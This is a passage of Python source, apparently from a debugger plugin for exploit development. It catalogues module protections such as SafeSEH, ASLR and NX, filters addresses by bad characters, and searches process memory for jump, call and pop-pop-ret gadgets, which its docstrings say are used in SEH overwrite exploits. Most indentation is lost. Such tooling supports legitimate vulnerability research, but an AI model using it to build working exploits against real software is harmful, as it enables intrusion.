segbase = heapbase
lastindex = heapbase + offset
allsegmentsfound = False
lastsegment = readPtrSizeBytes(heapbase+offset+archValue(4,8)) - subtract
if heapbase == lastsegment:
allsegmentsfound = True
segmentcnt = 1
while not allsegmentsfound and segmentcnt < 100:
nextbase = readPtrSizeBytes(segbase + archValue(0x10,0x18)) - subtract
segbase = nextbase
if nextbase > 0 and (nextbase+subtract != lastindex):
segstart = readPtrSizeBytes(segbase + archValue(0x24,0x40))
segend = readPtrSizeBytes(segbase + archValue(0x28,0x48))
if not segbase in segmentinfo:
segmentinfo[segbase] = [segbase,segend,segstart,segend]
else:
allsegmentsfound = True
segmentcnt += 1
else:
offset = archValue(0x058,0x0a0)
i = 0
while not allsegmentsfound:
thisbase = readPtrSizeBytes(heapbase + offset + i*archValue(4,8))
if thisbase > 0 and not thisbase in segmentinfo:
# get start and end of segment
segstart = thisbase
segend = getSegmentEnd(segstart)
# get first and last valid entry
firstentry = readPtrSizeBytes(segstart + archValue(0x20,0x38))
lastentry = readPtrSizeBytes(segstart + archValue(0x24,0x40))
segmentinfo[thisbase] = [segstart,segend,firstentry,lastentry]
else:
allsegmentsfound = True
i += 1
# avoid infinite loop
if i > 100:
allsegmentsfound = True
except:
pass
segmentlistCache[heapbase] = segmentinfo
return segmentinfo
def containsBadChars(address,badchars="\x0a\x0d"):
"""
checks if the address contains bad chars
Arguments:
address - the address
badchars - string with the characters that should be avoided (defaults to 0x0a and 0x0d)
Return:
Boolean - True if badchars are found
"""
bytes = splitAddress(address)
chars = []
for byte in bytes:
chars.append(chr(byte))
# check each char
for char in chars:
if char in badchars:
return True
return False
def meetsCriteria(pointer,criteria):
"""
checks if an address meets the listed criteria
Arguments:
pointer - the MnPointer instance of the address
criteria - a dictionary with all the criteria to be met
Return:
Boolean - True if all the conditions are met
"""
# Unicode
if "unicode" in criteria and not (pointer.isUnicode or pointer.unicodeTransform != ""):
return False
if "unicoderev" in criteria and not pointer.isUnicodeRev:
return False
# Ascii
if "ascii" in criteria and not pointer.isAscii:
return False
# Ascii printable
if "asciiprint" in criteria and not pointer.isAsciiPrintable:
return False
# Uppercase
if "upper" in criteria and not pointer.isUppercase:
return False
# Lowercase
if "lower" in criteria and not pointer.isLowercase:
return False
# Uppercase numeric
if "uppernum" in criteria and not pointer.isUpperNum:
return False
# Lowercase numeric
if "lowernum" in criteria and not pointer.isLowerNum:
return False
# Numeric
if "numeric" in criteria and not pointer.isNumeric:
return False
# Alpha numeric
if "alphanum" in criteria and not pointer.isAlphaNumeric:
return False
# Bad chars
if "badchars" in criteria and containsBadChars(pointer.getAddress(), criteria["badchars"]):
return False
# Nulls
if "nonull" in criteria and pointer.hasNulls:
return False
if "startswithnull" in criteria and not pointer.startsWithNull:
return False
return True
def search(sequences,criteria=[]):
"""
    Alias for 'searchInRange', searching across the full default address range
    (0 up to TOP_USERLAND) for byte sequences
    Arguments:
    sequences - array of byte sequences to search for
    criteria - Dictionary containing the criteria each pointer should comply with
Return:
Dictionary (opcode sequence => List of addresses)
"""
    return searchInRange(sequences,criteria=criteria)
def searchInRange(sequences, start=0, end=TOP_USERLAND,criteria=[]):
"""
search for byte sequences in a specified address range
Arguments:
sequences - array of byte sequences to search for
start - the start address of the search (defaults to 0)
end - the end address of the search
criteria - Dictionary containing the criteria each pointer should comply with
Return:
Dictionary (opcode sequence => List of addresses)
"""
if not "accesslevel" in criteria:
criteria["accesslevel"] = "*"
global ptr_counter
global ptr_to_get
found_opcodes = {}
if (ptr_to_get < 0) or (ptr_to_get > 0 and ptr_counter < ptr_to_get):
if not sequences:
return {}
# check that start is before end
if start > end:
start, end = end, start
dbg.setStatusBar("Searching...")
dbg.getMemoryPages()
process_error_found = False
for a in dbg.MemoryPages.keys():
if (ptr_to_get < 0) or (ptr_to_get > 0 and ptr_counter < ptr_to_get):
# get end address of the page
page_start = a
page_size = dbg.MemoryPages[a].getSize()
page_end = a + page_size
if ( start > page_end or end < page_start ):
# we are outside the search range, skip
continue
if (not meetsAccessLevel(dbg.MemoryPages[a],criteria["accesslevel"])):
#skip this page, not executable
continue
# if the criteria check for nulls or unicode, we can skip
# modules that start with 00
start_fb = toHex(page_start)[0:2]
end_fb = toHex(page_end)[0:2]
if ( ("nonull" in criteria and criteria["nonull"]) and start_fb == "00" and end_fb == "00" ):
if not silent:
dbg.log(" !Skipped search of range %08x-%08x (Has nulls)" % (page_start,page_end))
continue
if (( ("startswithnull" in criteria and criteria["startswithnull"]))
and (start_fb != "00" or end_fb != "00")):
if not silent:
dbg.log(" !Skipped search of range %08x-%08x (Doesn't start with null)" % (page_start,page_end))
continue
mem = dbg.MemoryPages[a].getMemory()
if not mem:
continue
# loop on each sequence
for seq in sequences:
if (ptr_to_get < 0) or (ptr_to_get > 0 and ptr_counter < ptr_to_get):
buf = None
human_format = ""
if type(seq) == str:
human_format = seq.replace("\n"," # ")
buf = dbg.assemble(seq)
else:
human_format = seq[0].replace("\n"," # ")
buf = seq[1]
recur_find = []
try:
buf_len = len(buf)
mem_list = mem.split( buf )
total_length = buf_len * -1
except:
process_error_found = True
dbg.log(" ** Unable to process searchPattern '%s'. **" % human_format)
break
for i in mem_list:
total_length = total_length + len(i) + buf_len
seq_address = a + total_length
recur_find.append( seq_address )
#The last one is the remaining slice from the split
#so remove it from the list
del recur_find[ len(recur_find) - 1 ]
page_find = []
for i in recur_find:
if ( i >= start and i <= end ):
ptr = MnPointer(i)
# check if pointer meets criteria
if not meetsCriteria(ptr, criteria):
continue
page_find.append(i)
ptr_counter += 1
if ptr_to_get > 0 and ptr_counter >= ptr_to_get:
#stop search
if human_format in found_opcodes:
found_opcodes[human_format] += page_find
else:
found_opcodes[human_format] = page_find
return found_opcodes
#add current pointers to the list and continue
if len(page_find) > 0:
if human_format in found_opcodes:
found_opcodes[human_format] += page_find
else:
found_opcodes[human_format] = page_find
if process_error_found:
break
return found_opcodes
# search for byte sequences in a module
def searchInModule(sequences, name,criteria=[]):
"""
search for byte sequences in a specified module
Arguments:
sequences - array of byte sequences to search for
name - the name of the module to search in
Return:
Dictionary (text opcode => array of addresses)
"""
module = dbg.getModule(name)
if(not module):
self.log("module %s not found" % name)
return []
# get the base and end address of the module
start = module.getBaseAddress()
end = start + module.getSize()
return searchInRange(sequences, start, end, criteria)
def getRangesOutsideModules():
"""
    This function will enumerate all memory ranges that are not associated with a module
Arguments : none
Returns : array of arrays, each containing a start and end address
"""
ranges=[]
moduleranges=[]
#get all ranges associated with modules
#force full rebuild to get all modules
populateModuleInfo()
for thismodule,modproperties in g_modules.iteritems():
top = 0
base = 0
for modprop,modval in modproperties.iteritems():
if modprop == "top":
top = modval
if modprop == "base":
base = modval
moduleranges.append([base,top])
#sort them
moduleranges.sort()
#get all ranges before, after and in between modules
startpointer = 0
endpointer = TOP_USERLAND
for modbase,modtop in moduleranges:
endpointer = modbase-1
ranges.append([startpointer,endpointer])
startpointer = modtop+1
ranges.append([startpointer,TOP_USERLAND])
#return array
return ranges
def isModuleLoadedInProcess(modulename):
if len(g_modules) == 0:
populateModuleInfo()
modulefound = False
module = dbg.getModule(modulename)
if(not module):
modulefound = False
else:
modulefound = True
return modulefound
def UnicodeTransformInfo(hexaddr):
"""
checks if the address can be used as unicode ansi transform
Arguments:
hexaddr - a string containing the address in hex format (4 bytes - 8 characters)
Return:
string with unicode transform info, or empty if address is not unicode transform
"""
outstring = ""
transform=0
almosttransform=0
begin = hexaddr[0] + hexaddr[1]
middle = hexaddr[4] + hexaddr[5]
twostr=hexaddr[2]+hexaddr[3]
begintwostr = hexaddr[6]+hexaddr[7]
threestr=hexaddr[4]+hexaddr[5]+hexaddr[6]
fourstr=hexaddr[4]+hexaddr[5]+hexaddr[6]+hexaddr[7]
beginfourstr = hexaddr[0]+hexaddr[1]+hexaddr[2]+hexaddr[3]
threestr=threestr.upper()
fourstr=fourstr.upper()
begintwostr = begintwostr.upper()
beginfourstr = beginfourstr.upper()
uniansiconv = [ ["20AC","80"], ["201A","82"],
["0192","83"], ["201E","84"], ["2026","85"],
["2020","86"], ["2021","87"], ["02C6","88"],
["2030","89"], ["0106","8A"], ["2039","8B"],
["0152","8C"], ["017D","8E"], ["2018","91"],
["2019","92"], ["201C","93"], ["201D","94"],
["2022","95"], ["2013","96"], ["2014","97"],
["02DC","98"], ["2122","99"], ["0161","9A"],
["203A","9B"], ["0153","9C"], ["017E","9E"],
["0178","9F"]
]
# 4 possible cases :
# 00xxBBBB
# 00xxBBBC (close transform)
# AAAA00xx
# AAAABBBB
convbyte=""
transbyte=""
ansibytes=""
#case 1 and 2
if begin == "00":
for ansirec in uniansiconv:
if ansirec[0]==fourstr:
convbyte=ansirec[1]
transbyte=ansirec[1]
transform=1
break
if transform==1:
outstring +="unicode ansi transformed : 00"+twostr+"00"+convbyte+","
ansistring=""
for ansirec in uniansiconv:
if ansirec[0][:3]==threestr:
                if (transform==0) or (transform==1 and ansirec[1] != transbyte):
convbyte=ansirec[1]
ansibytes=ansirec[0]
ansistring=ansistring+"00"+twostr+"00"+convbyte+"->00"+twostr+ansibytes+" / "
almosttransform=1
if almosttransform==1:
if transform==0:
outstring += "unicode possible ansi transform(s) : " + ansistring
else:
outstring +=" / alternatives (close pointers) : " + ansistring
#case 3
if middle == "00":
transform = 0
for ansirec in uniansiconv:
if ansirec[0]==beginfourstr:
convbyte=ansirec[1]
transform=1
break
if transform==1:
outstring +="unicode ansi transformed : 00"+convbyte+"00"+begintwostr+","
#case 4
if begin != "00" and middle != "00":
convbyte1=""
convbyte2=""
transform = 0
for ansirec in uniansiconv:
if ansirec[0]==beginfourstr:
convbyte1=ansirec[1]
transform=1
break
if transform == 1:
for ansirec in uniansiconv:
if ansirec[0]==fourstr:
convbyte2=ansirec[1]
transform=2
break
if transform==2:
outstring +="unicode ansi transformed : 00"+convbyte1+"00"+convbyte2+","
# done
outstring = outstring.rstrip(" / ")
if outstring:
if not outstring.endswith(","):
outstring += ","
return outstring
def getSearchSequences(searchtype,searchcriteria="",type="",criteria={}):
"""
will build array with search sequences for a given search type
Arguments:
searchtype = "jmp", "seh"
SearchCriteria (optional):
<register> in case of "jmp" : string containing a register
Return:
array with all searches to perform
"""
offsets = [ "", "0x04","0x08","0x0c","0x10","0x12","0x1C","0x20","0x24"]
regs=["eax","ebx","ecx","edx","esi","edi","ebp"]
search=[]
if searchtype.lower() == "jmp":
if not searchcriteria:
searchcriteria = "esp"
searchcriteria = searchcriteria.lower()
min = 0
max = 0
if "mindistance" in criteria:
min = criteria["mindistance"]
if "maxdistance" in criteria:
max = criteria["maxdistance"]
minval = min
while minval <= max:
extraval = ""
            if minval != 0:
operator = ""
negoperator = "-"
if minval < 0:
operator = "-"
negoperator = ""
thisval = str(minval).replace("-","")
thishexval = toHex(int(thisval))
extraval = operator + thishexval
if minval == 0:
search.append("jmp " + searchcriteria )
search.append("call " + searchcriteria)
for roffset in offsets:
search.append("push "+searchcriteria+"\nret "+roffset)
for reg in regs:
if reg != searchcriteria:
search.append("push " + searchcriteria + "\npop "+reg+"\njmp "+reg)
search.append("push " + searchcriteria + "\npop "+reg+"\ncall "+reg)
search.append("mov "+reg+"," + searchcriteria + "\njmp "+reg)
search.append("mov "+reg+"," + searchcriteria + "\ncall "+reg)
search.append("xchg "+reg+","+searchcriteria+"\njmp " + reg)
search.append("xchg "+reg+","+searchcriteria+"\ncall " + reg)
for roffset in offsets:
search.append("push " + searchcriteria + "\npop "+reg+"\npush "+reg+"\nret "+roffset)
search.append("mov "+reg+"," + searchcriteria + "\npush "+reg+"\nret "+roffset)
search.append("xchg "+reg+","+searchcriteria+"\npush " + reg + "\nret " + roffset)
else:
# offset jumps
search.append("add " + searchcriteria + "," + operator + thishexval + "\njmp " + searchcriteria)
search.append("add " + searchcriteria + "," + operator + thishexval + "\ncall " + searchcriteria)
search.append("sub " + searchcriteria + "," + negoperator + thishexval + "\njmp " + searchcriteria)
search.append("sub " + searchcriteria + "," + negoperator + thishexval + "\ncall " + searchcriteria)
for roffset in offsets:
search.append("add " + searchcriteria + "," + operator + thishexval + "\npush " + searchcriteria + "\nret " + roffset)
search.append("sub " + searchcriteria + "," + negoperator + thishexval + "\npush " + searchcriteria + "\nret " + roffset)
if minval > 0:
search.append("jmp " + searchcriteria + extraval)
search.append("call " + searchcriteria + extraval)
minval += 1
if searchtype.lower() == "seh":
for roffset in offsets:
for r1 in regs:
search.append( ["add esp,4\npop " + r1+"\nret "+roffset,dbg.assemble("add esp,4\npop " + r1+"\nret "+roffset)] )
search.append( ["pop " + r1+"\nadd esp,4\nret "+roffset,dbg.assemble("pop " + r1+"\nadd esp,4\nret "+roffset)] )
for r2 in regs:
thissearch = ["pop "+r1+"\npop "+r2+"\nret "+roffset,dbg.assemble("pop "+r1+"\npop "+r2+"\nret "+roffset)]
search.append( thissearch )
if type == "rop":
search.append( ["pop "+r1+"\npop "+r2+"\npop esp\nret "+roffset,dbg.assemble("pop "+r1+"\npop "+r2+"\npop esp\nret "+roffset)] )
for r3 in regs:
search.append( ["pop "+r1+"\npop "+r2+"\npop "+r3+"\ncall ["+r3+"]",dbg.assemble("pop "+r1+"\npop "+r2+"\npop "+r3+"\ncall ["+r3+"]")] )
search.append( ["add esp,8\nret "+roffset,dbg.assemble("add esp,8\nret "+roffset)])
search.append( ["popad\npush ebp\nret "+roffset,dbg.assemble("popad\npush ebp\nret "+roffset)])
#popad + jmp/call
search.append(["popad\njmp ebp",dbg.assemble("popad\njmp ebp")])
search.append(["popad\ncall ebp",dbg.assemble("popad\ncall ebp")])
#call / jmp dword
search.append(["call dword ptr ss:[esp+08]","\xff\x54\x24\x08"])
search.append(["call dword ptr ss:[esp+08]","\xff\x94\x24\x08\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+08]","\x3e\xff\x54\x24\x08"])
search.append(["jmp dword ptr ss:[esp+08]","\xff\x64\x24\x08"])
search.append(["jmp dword ptr ss:[esp+08]","\xff\xa4\x24\x08\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+08]","\x3e\xff\x64\x24\x08"])
search.append(["call dword ptr ss:[esp+14]","\xff\x54\x24\x14"])
search.append(["call dword ptr ss:[esp+14]","\xff\x94\x24\x14\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+14]","\x3e\xff\x54\x24\x14"])
search.append(["jmp dword ptr ss:[esp+14]","\xff\x64\x24\x14"])
search.append(["jmp dword ptr ss:[esp+14]","\xff\xa4\x24\x14\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+14]","\x3e\xff\x64\x24\x14"])
search.append(["call dword ptr ss:[esp+1c]","\xff\x54\x24\x1c"])
search.append(["call dword ptr ss:[esp+1c]","\xff\x94\x24\x1c\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+1c]","\x3e\xff\x54\x24\x1c"])
search.append(["jmp dword ptr ss:[esp+1c]","\xff\x64\x24\x1c"])
search.append(["jmp dword ptr ss:[esp+1c]","\xff\xa4\x24\x1c\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+1c]","\x3e\xff\x64\x24\x1c"])
search.append(["call dword ptr ss:[esp+2c]","\xff\x54\x24\x2c"])
search.append(["call dword ptr ss:[esp+2c]","\xff\x94\x24\x2c\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+2c]","\x3e\xff\x54\x24\x2c"])
search.append(["jmp dword ptr ss:[esp+2c]","\xff\x64\x24\x2c"])
search.append(["jmp dword ptr ss:[esp+2c]","\xff\xa4\x24\x2c\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+2c]","\x3e\xff\x64\x24\x2c"])
search.append(["call dword ptr ss:[esp+44]","\xff\x54\x24\x44"])
search.append(["call dword ptr ss:[esp+44]","\xff\x94\x24\x44\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+44]","\x3e\xff\x54\x24\x44"])
search.append(["jmp dword ptr ss:[esp+44]","\xff\x64\x24\x44"])
search.append(["jmp dword ptr ss:[esp+44]","\xff\xa4\x24\x44\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+44]","\x3e\xff\x64\x24\x44"])
search.append(["call dword ptr ss:[esp+50]","\xff\x54\x24\x50"])
search.append(["call dword ptr ss:[esp+50]","\xff\x94\x24\x50\x00\x00\x00"])
search.append(["call dword ptr ds:[esp+50]","\x3e\xff\x54\x24\x50"])
search.append(["jmp dword ptr ss:[esp+50]","\xff\x64\x24\x50"])
search.append(["jmp dword ptr ss:[esp+50]","\xff\xa4\x24\x50\x00\x00\x00"])
search.append(["jmp dword ptr ds:[esp+50]","\x3e\xff\x64\x24\x50"])
search.append(["call dword ptr ss:[ebp+0c]","\xff\x55\x0c"])
search.append(["call dword ptr ss:[ebp+0c]","\xff\x95\x0c\x00\x00\x00"])
search.append(["call dword ptr ds:[ebp+0c]","\x3e\xff\x55\x0c"])
search.append(["jmp dword ptr ss:[ebp+0c]","\xff\x65\x0c"])
search.append(["jmp dword ptr ss:[ebp+0c]","\xff\xa5\x0c\x00\x00\x00"])
search.append(["jmp dword ptr ds:[ebp+0c]","\x3e\xff\x65\x0c"])
search.append(["call dword ptr ss:[ebp+24]","\xff\x55\x24"])
search.append(["call dword ptr ss:[ebp+24]","\xff\x95\x24\x00\x00\x00"])
search.append(["call dword ptr ds:[ebp+24]","\x3e\xff\x55\x24"])
search.append(["jmp dword ptr ss:[ebp+24]","\xff\x65\x24"])
search.append(["jmp dword ptr ss:[ebp+24]","\xff\xa5\x24\x00\x00\x00"])
search.append(["jmp dword ptr ds:[ebp+24]","\x3e\xff\x65\x24"])
search.append(["call dword ptr ss:[ebp+30]","\xff\x55\x30"])
search.append(["call dword ptr ss:[ebp+30]","\xff\x95\x30\x00\x00\x00"])
search.append(["call dword ptr ds:[ebp+30]","\x3e\xff\x55\x30"])
search.append(["jmp dword ptr ss:[ebp+30]","\xff\x65\x30"])
search.append(["jmp dword ptr ss:[ebp+30]","\xff\xa5\x30\x00\x00\x00"])
search.append(["jmp dword ptr ds:[ebp+30]","\x3e\xff\x65\x30"])
search.append(["call dword ptr ss:[ebp-04]","\xff\x55\xfc"])
search.append(["call dword ptr ss:[ebp-04]","\xff\x95\xfc\xff\xff\xff"])
search.append(["call dword ptr ds:[ebp-04]","\x3e\xff\x55\xfc"])
search.append(["jmp dword ptr ss:[ebp-04]","\xff\x65\xfc",])
search.append(["jmp dword ptr ss:[ebp-04]","\xff\xa5\xfc\xff\xff\xff",])
search.append(["jmp dword ptr ds:[ebp-04]","\x3e\xff\x65\xfc",])
search.append(["call dword ptr ss:[ebp-0c]","\xff\x55\xf4"])
search.append(["call dword ptr ss:[ebp-0c]","\xff\x95\xf4\xff\xff\xff"])
search.append(["call dword ptr ds:[ebp-0c]","\x3e\xff\x55\xf4"])
search.append(["jmp dword ptr ss:[ebp-0c]","\xff\x65\xf4",])
search.append(["jmp dword ptr ss:[ebp-0c]","\xff\xa5\xf4\xff\xff\xff",])
search.append(["jmp dword ptr ds:[ebp-0c]","\x3e\xff\x65\xf4",])
search.append(["call dword ptr ss:[ebp-18]","\xff\x55\xe8"])
search.append(["call dword ptr ss:[ebp-18]","\xff\x95\xe8\xff\xff\xff"])
search.append(["call dword ptr ds:[ebp-18]","\x3e\xff\x55\xe8"])
search.append(["jmp dword ptr ss:[ebp-18]","\xff\x65\xe8",])
search.append(["jmp dword ptr ss:[ebp-18]","\xff\xa5\xe8\xff\xff\xff",])
search.append(["jmp dword ptr ds:[ebp-18]","\x3e\xff\x65\xe8",])
return search
def getModulesToQuery(criteria):
"""
This function will return an array of modulenames
Arguments:
Criteria - dictionary with module criteria
Return:
array with module names that meet the given criteria
"""
# always populate module info, in case more DLLs were loaded
populateModuleInfo()
modulestoquery=[]
for thismodule,modproperties in g_modules.iteritems():
#is this module excluded ?
thismod = MnModule(thismodule)
included = True
if not thismod.isExcluded:
#check other criteria
if ("safeseh" in criteria) and ((not criteria["safeseh"]) and thismod.isSafeSEH):
included = False
if ("aslr" in criteria) and ((not criteria["aslr"]) and thismod.isAslr):
included = False
if ("rebase" in criteria) and ((not criteria["rebase"]) and thismod.isRebase):
included = False
if ("os" in criteria) and ((not criteria["os"]) and thismod.isOS):
included = False
if ("nx" in criteria) and ((not criteria["nx"]) and thismod.isNX):
included = False
else:
included = False
#override all previous decision if "modules" criteria was provided
thismodkey = thismod.moduleKey.lower().strip()
if ("modules" in criteria) and (criteria["modules"] != ""):
included = False
modulenames=criteria["modules"].split(",")
for modulename in modulenames:
modulename = modulename.strip('"').strip("'").lower()
modulenamewithout = modulename.replace("*","")
if len(modulenamewithout) <= len(thismodkey):
#endswith ?
if modulename[0] == "*":
if modulenamewithout == thismodkey[len(thismodkey)-len(modulenamewithout):len(thismodkey)]:
if not thismod.moduleKey in modulestoquery and not thismod.isExcluded:
modulestoquery.append(thismod.moduleKey)
#startswith ?
if modulename[len(modulename)-1] == "*":
if (modulenamewithout == thismodkey[0:len(modulenamewithout)] and not thismod.isExcluded):
if not thismod.moduleKey in modulestoquery:
modulestoquery.append(thismod.moduleKey)
#contains ?
if ((modulename[0] == "*" and modulename[len(modulename)-1] == "*") or (modulename.find("*") == -1)) and not thismod.isExcluded:
if thismodkey.find(modulenamewithout) > -1:
if not thismod.moduleKey in modulestoquery:
modulestoquery.append(thismod.moduleKey)
if included:
modulestoquery.append(thismod.moduleKey)
return modulestoquery
def getPointerAccess(address):
"""
Returns access level of specified address, in human readable format
Arguments:
address - integer value
Return:
Access level (human readable format)
"""
global MemoryPageACL
paccess = ""
try:
page = dbg.getMemoryPageByAddress( address )
if page in MemoryPageACL:
paccess = MemoryPageACL[page]
else:
paccess = page.getAccess( human = True )
MemoryPageACL[page] = paccess
except:
paccess = ""
return paccess
def getModuleProperty(modname,parameter):
"""
Returns value of a given module property
Argument :
modname - module name
parameter name - (see populateModuleInfo())
Returns :
    value associated with the given parameter / module combination
"""
modname=modname.strip()
parameter=parameter.lower()
valtoreturn=""
# try case sensitive first
for thismodule,modproperties in g_modules.iteritems():
if thismodule.strip() == modname:
return modproperties[parameter]
return valtoreturn
def populateModuleInfo():
"""
Populate global dictionary with information about all loaded modules
Return:
    None - the global g_modules dictionary is (re)populated
"""
if not silent:
dbg.setStatusBar("Getting modules info...")
dbg.log("[+] Generating module info table, hang on...")
dbg.log(" - Processing modules")
dbg.updateLog()
global g_modules
g_modules={}
allmodules=dbg.getAllModules()
curmod = ""
for key in allmodules.keys():
modinfo={}
thismod = MnModule(key)
if not thismod is None:
modinfo["path"] = thismod.modulePath
modinfo["base"] = thismod.moduleBase
modinfo["size"] = thismod.moduleSize
modinfo["top"] = thismod.moduleTop
modinfo["safeseh"] = thismod.isSafeSEH
modinfo["aslr"] = thismod.isAslr
modinfo["nx"] = thismod.isNX
modinfo["rebase"] = thismod.isRebase
modinfo["version"] = thismod.moduleVersion
modinfo["os"] = thismod.isOS
modinfo["name"] = key
modinfo["entry"] = thismod.moduleEntry
modinfo["codebase"] = thismod.moduleCodebase
modinfo["codesize"] = thismod.moduleCodesize
modinfo["codetop"] = thismod.moduleCodetop
g_modules[thismod.moduleKey] = modinfo
else:
if not silent:
dbg.log(" - Oops, potential issue with module %s, skipping module" % key)
if not silent:
dbg.log(" - Done. Let's rock 'n roll.")
dbg.setStatusBar("")
dbg.updateLog()
def ModInfoCached(modulename):
"""
Check if the information about a given module is already cached in the global Dictionary
Arguments:
modulename - name of the module to check
Return:
Boolean - True if the module info is cached
"""
if (getModuleProperty(modulename,"base") == ""):
return False
else:
return True
def showModuleTable(logfile="", modules=[]):
"""
Shows table with all loaded modules and their properties.
Arguments :
    logfile - empty string : output is appended to the default log file
              a filename   : output is written to that file
    modules - optional list of module names to include in the table
"""
thistable = ""
if len(g_modules) == 0:
populateModuleInfo()
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
thistable += " Module info :\n"
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
if arch == 32:
thistable += " Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path\n"
elif arch == 64:
thistable += " Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path\n"
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
for thismodule,modproperties in g_modules.iteritems():
if (len(modules) > 0 and modproperties["name"] in modules or len(logfile)>0):
rebase = toSize(str(modproperties["rebase"]),7)
base = toSize(str("0x" + toHex(modproperties["base"])),10)
top = toSize(str("0x" + toHex(modproperties["top"])),10)
size = toSize(str("0x" + toHex(modproperties["size"])),10)
safeseh = toSize(str(modproperties["safeseh"]),7)
aslr = toSize(str(modproperties["aslr"]),5)
nx = toSize(str(modproperties["nx"]),7)
isos = toSize(str(modproperties["os"]),7)
version = str(modproperties["version"])
path = str(modproperties["path"])
name = str(modproperties["name"])
thistable += " " + base + " | " + top + " | " + size + " | " + rebase +"| " +safeseh + " | " + aslr + " | " + nx + " | " + isos + "| " + version + " [" + name + "] (" + path + ")\n"
thistable += "-----------------------------------------------------------------------------------------------------------------------------------------\n"
tableinfo = thistable.split('\n')
if logfile == "":
with open(S17_LOGFILE,"a") as fh:
fh.writelines(thistable)
dbg.log("Output written to: " + S17_LOGFILE)
else:
with open(logfile,"a") as fh:
fh.writelines(thistable)
#-----------------------------------------------------------------------#
# This is where the action is
#-----------------------------------------------------------------------#
def processResults(all_opcodes,logfile,thislog,specialcases = {},ptronly = False):
"""
Write the output of a search operation to log file
Arguments:
all_opcodes - dictionary containing the results of a search
logfile - the MnLog object
thislog - the filename to write to
Return:
written content in log file
first 20 pointers are shown in the log window
"""
ptrcnt = 0
cnt = 0
global silent
if all_opcodes:
dbg.log("[+] Writing results to %s" % thislog)
for hf in all_opcodes:
if not silent:
try:
dbg.log(" - Number of pointers of type '%s' : %d " % (hf,len(all_opcodes[hf])))
except:
dbg.log(" - Number of pointers of type '<unable to display>' : %d " % (len(all_opcodes[hf])))
if not ptronly:
if not silent:
with open(S17_LOGFILE, 'a') as fn:
fn.write("Results of find:\n")
dbg.log("[+] Results written to: "+S17_LOGFILE)
messageshown = False
for optext,pointers in all_opcodes.iteritems():
for ptr in pointers:
ptrinfo = ""
modinfo = ""
ptrx = MnPointer(ptr)
modname = ptrx.belongsTo()
if not modname == "":
modobj = MnModule(modname)
ptrextra = ""
rva=0
if (modobj.isRebase or modobj.isAslr):
rva = ptr - modobj.moduleBase
ptrextra = " (b+0x" + toHex(rva)+") "
ptrinfo = "0x" + toHex(ptr) + ptrextra + " : " + optext + " | " + ptrx.__str__() + " " + modobj.__str__()
else:
ptrinfo = "0x" + toHex(ptr) + " : " + optext + " | " + ptrx.__str__()
if ptrx.isOnStack():
ptrinfo += " [Stack] "
elif ptrx.isInHeap():
ptrinfo += " [Heap] "
logfile.write(ptrinfo,thislog)
if (ptr_to_get > -1) or (cnt < 20):
if not silent:
with open(S17_LOGFILE, 'a') as fn:
fn.write(" %s\n" % ptrinfo)
#dbg.log(" %s" % ptrinfo,address=ptr)
cnt += 1
ptrcnt += 1
if (ptr_to_get == -1 or ptr_to_get > 20) and cnt == 20 and not silent and not messageshown:
dbg.log("... Please wait while I'm processing all remaining results and writing everything to file...")
messageshown = True
if cnt < ptrcnt:
if not silent:
dbg.log("[+] Done. Only the first %d pointers are shown here. For more pointers, open %s..." % (cnt,thislog))
else:
allptr = []
ptrcnt = 0
ptrinfo = ""
dbg.log("... Please wait while I'm processing results and writing everything to file...")
for optext,pointers in all_opcodes.iteritems():
for ptr in pointers:
if not ptr in allptr:
ptrinfo += "0x%s\n" % toHex(ptr)
ptrcnt += 1
if not silent:
dbg.log("[+] Writing results to file")
logfile.write(ptrinfo,thislog)
if not silent:
dbg.log("[+] Done")
dbg.log(" Found a total of %d pointers" % ptrcnt, highlight=1)
with open(S17_LOGFILE, 'a') as fn:
fn.write("Found a total of %d pointers\n" % ptrcnt)
dbg.setStatusBar("Done. Found %d pointers" % ptrcnt)
def mergeOpcodes(all_opcodes,found_opcodes):
"""
merges two dictionaries together
Arguments:
all_opcodes - the target dictionary
found_opcodes - the source dictionary
Return:
Dictionary (merged dictionaries)
"""
if found_opcodes:
for hf in found_opcodes:
if hf in all_opcodes:
all_opcodes[hf] += found_opcodes[hf]
else:
all_opcodes[hf] = found_opcodes[hf]
return all_opcodes
def findSEH(modulecriteria={},criteria={}):
"""
Performs a search for pointers to gain code execution in a SEH overwrite exploit
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
Default settings are : ignore aslr, rebase and safeseh protected modules
criteria - dictionary with criteria the pointers need to comply with.
Return:
Dictionary (pointers)
"""
type = ""
if "rop" in criteria:
type = "rop"
search = getSearchSequences("seh",0,type)
found_opcodes = {}
all_opcodes = {}
modulestosearch = getModulesToQuery(modulecriteria)
if not silent:
dbg.log("[+] Querying %d modules" % len(modulestosearch))
starttime = datetime.datetime.now()
for thismodule in modulestosearch:
if not silent:
dbg.log(" - Querying module %s" % thismodule)
dbg.updateLog()
#search
found_opcodes = searchInModule(search,thismodule,criteria)
#merge results
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
#search outside modules
if "all" in criteria:
if "accesslevel" in criteria:
if criteria["accesslevel"].find("R") == -1:
if not silent:
dbg.log("[+] Setting pointer access level criteria to 'R', to increase search results")
criteria["accesslevel"] = "R"
if not silent:
dbg.log(" New pointer access level : %s" % criteria["accesslevel"])
if criteria["all"]:
rangestosearch = getRangesOutsideModules()
if not silent:
dbg.log("[+] Querying memory outside modules")
for thisrange in rangestosearch:
if not silent:
dbg.log(" - Querying 0x%08x - 0x%08x" % (thisrange[0],thisrange[1]))
found_opcodes = searchInRange(search, thisrange[0], thisrange[1],criteria)
all_opcodes = mergeOpcodes(all_opcodes,found_opcodes)
if not silent:
